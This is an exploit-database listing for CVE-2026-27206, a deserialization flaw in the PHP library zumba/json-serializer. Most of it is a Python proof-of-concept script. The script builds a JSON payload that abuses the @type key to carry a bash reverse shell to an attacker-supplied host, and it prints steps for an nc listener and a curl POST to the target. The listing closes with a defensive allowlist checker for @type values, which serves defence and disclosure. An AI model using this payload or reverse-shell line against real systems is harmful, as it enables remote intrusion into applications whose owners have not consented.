zumba/json-serializer zumba/json-serializer < 3.2.3 RCE
Summary: this listing describes a remote code execution vulnerability (CVE-2026-27206) in zumba/json-serializer < 3.2.3, in which the @type key handled during deserialization allows arbitrary object creation and potential code execution.
2026-3-15 16:26:34 Author: cxsecurity.com


#!/usr/bin/env python3
# Exploit Title: zumba/json-serializer zumba/json-serializer < 3.2.3 RCE
# CVE: CVE-2026-27206
# Date: 2026-02-24
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub:
# Vendor Homepage: https://github.com/zumba/json-serializer
# Software Link: https://github.com/zumba/json-serializer
# Affected: zumba/json-serializer < 3.2.3
# Tested on: PHP 8.1 / 8.2
# Category: Remote Code Execution
# Platform: PHP
# Exploit Type: Remote
# CVSS: 8.1 (HIGH)
# CWE: CWE-502 (Deserialization of Untrusted Data)
# Description: Unrestricted PHP object instantiation via @type in
#   JsonSerializer::unserialize() allowing arbitrary class creation and
#   potential code execution via magic methods / gadget chains
# Fixed in: 3.2.3
# Usage: python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
#
# Examples:
#   python3 exploit.py http://example.com/api/unserialize --lhost 192.168.1.100 --lport 4444
#
# Notes:
#   • This script generates and shows a malicious payload.
#   • Actual exploitation requires:
#       1. An endpoint that accepts JSON and passes it directly to JsonSerializer::unserialize()
#       2. A usable POP gadget chain present in the target application or its dependencies
#   • Without a gadget chain this only demonstrates object injection (no RCE).
#

import argparse
import json
import sys

# Banner (raw string so the backslashes in the ASCII art are not treated as escapes)
print(r"""
  ____   _____    ___    _   _    ___     ___     ___
 / ___| | ____|  / _ \  | | | |  / _ \   / _ \   / _ \
| |     |  _|   | | | | | |_| | | | | | | | | | | | | |
| |___  | |___  | |_| | |  _  | | |_| | | |_| | | |_| |
 \____| |_____|  \___/  |_| |_|  \___/   \___/   \___/

CVE-2026-27206 – Proof of Concept
────────────────────────────────────
Author    : Mohammed Idrees Banyamer
Country   : Jordan
Instagram : @banyamer_security
Date      : 2026-02-24
""")


def generate_payload(lhost, lport):
    # Example reverse shell command (modify for your target OS / needs)
    revshell_cmd = (
        f"bash -c \"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\""
    )
    # This is a DEMONSTRATION payload.
    # In real attacks you need a valid gadget chain (Monolog, Symfony, Laravel, etc.)
    payload = {
        "@type": "RCEGadget",
        "cmd": revshell_cmd
    }
    return json.dumps(payload, separators=(',', ':'))


def main():
    parser = argparse.ArgumentParser(description="CVE-2026-27206 Proof of Concept - Payload Generator")
    parser.add_argument("target", help="Target URL that accepts JSON input (for display only)")
    parser.add_argument("--lhost", required=True, help="Your IP address for reverse shell")
    parser.add_argument("--lport", required=True, help="Port to listen on")
    args = parser.parse_args()

    print(f"[*] Target URL (info only): {args.target}")
    print(f"[*] Listener: {args.lhost}:{args.lport}")
    print()

    malicious_json = generate_payload(args.lhost, args.lport)

    print("[+] Generated malicious JSON payload:")
    print("──────────────────────────────────────────────────────────────────────────────")
    print(malicious_json)
    print("──────────────────────────────────────────────────────────────────────────────")
    print()
    print("[!] How to use this payload:")
    print("    1. Start a listener: nc -lvnp", args.lport)
    print("    2. POST the JSON above to an endpoint that uses JsonSerializer::unserialize()")
    print("       Example (curl):")
    print(f"       curl -X POST {args.target} \\")
    print("            -H 'Content-Type: application/json' \\")
    print("            -d '" + malicious_json.replace("'", "'\\''") + "'")
    print()
    print("[!] Important:")
    print("    This payload only works if the application:")
    print("      • Uses vulnerable zumba/json-serializer (< 3.2.3)")
    print("      • Does NOT call setAllowedClasses()")
    print("      • Contains a POP chain that triggers code execution from the crafted object")
    print()
    print("    Without a gadget chain → only object injection (no RCE)")
    print("    Upgrade to >= 3.2.3 and use setAllowedClasses([]) or a whitelist")


if __name__ == "__main__":
    if len(sys.argv) == 1:
        print("Error: Missing arguments. Use --help for usage.\n")
        sys.exit(1)
    main()
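A defender-side pre-check, added here as an example (it is neither part of the listing above nor the library's own code): before untrusted JSON reaches JsonSerializer::unserialize(), walk the document and reject any @type value outside an explicit allowlist, which is the same policy the advisory recommends enforcing with setAllowedClasses(). The application class name and the sample payloads are constructed for the demonstration.

```python
import json

# Key under which zumba/json-serializer records the PHP class to instantiate
# (the key the PoC above abuses).
TYPE_KEY = "@type"


def find_disallowed_types(node, allowed, path="$"):
    """Walk a decoded JSON document and return (json_path, class_name) for every
    @type value not present in `allowed`. Arrays and nested objects are
    descended into, because object graphs are serialized recursively and an
    unexpected class can sit several levels below the top-level object."""
    findings = []
    if isinstance(node, dict):
        if TYPE_KEY in node:
            cls = node[TYPE_KEY]
            # Non-string values and unknown classes are both rejected.
            if not isinstance(cls, str) or cls not in allowed:
                findings.append((path, cls))
        for key, value in node.items():
            findings.extend(find_disallowed_types(value, allowed, f"{path}.{key}"))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            findings.extend(find_disallowed_types(value, allowed, f"{path}[{index}]"))
    return findings


def check_payload(json_text, allowed):
    """Return (accepted, findings). Malformed JSON is rejected outright, as is any
    document naming a class outside the allowlist; an empty allowlist rejects
    every @type, mirroring setAllowedClasses([])."""
    try:
        document = json.loads(json_text)
    except ValueError:
        return False, [("$", "<invalid json>")]
    findings = find_disallowed_types(document, frozenset(allowed))
    return not findings, findings


# Constructed sample inputs: a hypothetical allowlisted application class and
# PoC-shaped payloads naming a class the application never expects.
ALLOWED = {"App\\Model\\User"}
LEGIT = '{"@type":"App\\\\Model\\\\User","name":"alice","roles":["admin"]}'
POC_SHAPED = '{"@type":"RCEGadget","cmd":"<placeholder>"}'
NESTED = '{"@type":"App\\\\Model\\\\User","friends":[{"@type":"RCEGadget"}]}'

if __name__ == "__main__":
    for label, text in (("legit", LEGIT), ("poc", POC_SHAPED), ("nested", NESTED)):
        accepted, findings = check_payload(text, ALLOWED)
        print(label, "ACCEPT" if accepted else "REJECT", findings)
```

The findings carry a JSON path, so a rejected request can be logged with the exact location of the unexpected class rather than just a boolean.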

Copyright 2026, cxsecurity.com



Source: https://cxsecurity.com/issue/WLB-2026030023